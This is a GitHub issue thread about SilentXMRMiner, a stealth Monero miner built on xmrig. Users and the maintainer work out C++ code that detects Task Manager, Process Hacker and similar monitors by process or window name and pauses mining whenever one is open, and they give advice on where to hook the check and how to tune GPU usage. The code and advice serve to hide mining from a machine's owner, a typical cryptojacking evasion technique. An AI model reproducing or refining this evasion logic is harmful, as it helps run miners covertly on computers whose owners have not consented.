### ISSUE TITLE
Windows 7 issue

### ISSUE THREAD

**Issue by gamethrower** [UnamSanctam/SilentXMRMiner#273]
Hello, Unam. Since Task Manager doesn't have a class in Windows 7, which is critical in my case, I decided to modify xmrig myself and implement searching for process by its name, e.g. `taskmgr.exe`.

I ended up with this code:
```
bool check()
{
    PROCESSENTRY32 pe32 = { 0 };
    HANDLE    hSnap;
    int       iDone;
    bool      bFound;

    while (true) 
    {
        hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        pe32.dwSize = sizeof(PROCESSENTRY32);
        Process32First(hSnap, &pe32); 

        bFound = false;  
        iDone = 1;

        while (iDone)    // go until out of Processes
        {
            iDone = Process32Next(hSnap, &pe32);
            if (strcmp(pe32.szExeFile, "taskmgr.exe") == 0)   
            {
                bFound = true;
                iDone = 0;
            }
        }

        if (bProcessFound)
            std::cout << "Task Manger is running\n";
        CloseHandle(hSnap);
        Sleep(500);
    }
}
```
It's ineffective compared to searching by class or title but I can't find a solution other than going through all process list. If I just list window titles like this:
```
bool check()
{
    HWND hwnd;
    hwnd = FindWindow("ProcessHacker", NULL);
    hwnd = FindWindow("TaskManagerWindow", NULL);
    hwnd = FindWindow(NULL, "Windows Task Manager");
    hwnd = FindWindow(NULL, "Диспетчер задач Windows");
	if (hwnd != 0) 
		return true;
     return false;
}
```
Would it be more effective or do you have any better ideas?

After browsing the xmrig source code I found this function in `Miner.cpp`:
`void xmrig::Miner::setEnabled(bool enabled)`
Is this the function I need to pause the miner or there is something else?

**Comment by UnamSanctam** [comment]
The second solution is a lot faster from my tests, the issue with the first one is that since the check will run like every 5 seconds it's not very feasible to do it that way. And yes, setEnabled() is the method you should use.

**Comment by gamethrower** [comment]
Does miner hide only from Task Manager, Process Hacker and Process Explore or there is more process monitoring programs I haven't heard of?

**Comment by UnamSanctam** [comment]
No those are the only one at the moment since they have to be added in that list which will make it do more API calls. I don't really want make 20 API calls every 5 seconds.

**Comment by gamethrower** [comment]
Why 5 seconds tho? Task Manager opens a lot faster and CPU activity can be seen.
I thought about adding the function into main loop but I didn't find it honestly and decided to make a separate thread for it. After debugging xmrig line by line I ended up in `void xmrig::CpuWorker<N>::start()` loop but is it main?

**Comment by UnamSanctam** [comment]
I used to have it at 1 second when I only checked Task Manager but doing like 5-20 API calls per second feels like a bit much which is why I set it higher. You can put the loop anywhere where it can call the miners `setEnabled`, you can put it in `xmrig::Miner::onTimer` since that is the main one that runs while it's mining.

**Comment by gamethrower** [comment]
> you can put it in `xmrig::Miner::onTimer` since that is the main one that runs while it's mining

Oh thank you! That's what I was looking for.

**Comment by dyachenkomark** [comment]
![image](https://user-images.githubusercontent.com/82396918/118698531-32265c00-b819-11eb-9a9b-aa3d598dbbce.jpeg)

Have such problem, because of old windows 7 computer. Will it be optimized for old version?

**Comment by UnamSanctam** [comment]
It seems like that computer is 32-bit, XMRig had moved away from 32-bit and only supports 64-bit.

**Comment by dyachenkomark** [comment]
will you add option to control GPU power?

**Comment by UnamSanctam** [comment]
Already exists.

**Comment by dyachenkomark** [comment]
I have found "advanced parameters", so if i understand right, the last numeral is percent of GPU power?
--algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr  --cuda-bfactor-hint=12 --cuda-bsleep-hint=100
so if i want a 50 percent of power, it will looks like that?
--algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr  --cuda-bfactor-hint=12 --cuda-bsleep-hint=50

**Comment by UnamSanctam** [comment]
No, cuda-bfactor-hint and cuda-bsleep-hint decide how much the GPU should use and how long it should sleep between calls. --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 is technically the lowest you usually go. If you change --cuda-bsleep-hint to 50 it will use more GPU since it will sleep less. What cryptocurrency are you planning on mining with the GPU?

**Comment by dyachenkomark** [comment]
I am mining XMR, but would like to connect 30 percent of GPU and see the results.

**Comment by UnamSanctam** [comment]
Well, you shouldn't mine XMR with GPU since it's a CPU coin. You would have to find the settings for the different cuda settings which will use 30% GPU on your cards since it will be different for all cards.

You should probably mine Ravencoin or any Ethash/Etchash https://github.com/UnamSanctam/SilentETHMiner coin with the GPU instead.

**Comment by dyachenkomark** [comment]
Can i use 2 different silent miner on 1 computer?

**Comment by UnamSanctam** [comment]
Yes you can do that if you only mine with CPU on one and GPU with the other.

**Comment by dyachenkomark** [comment]
Thank you!
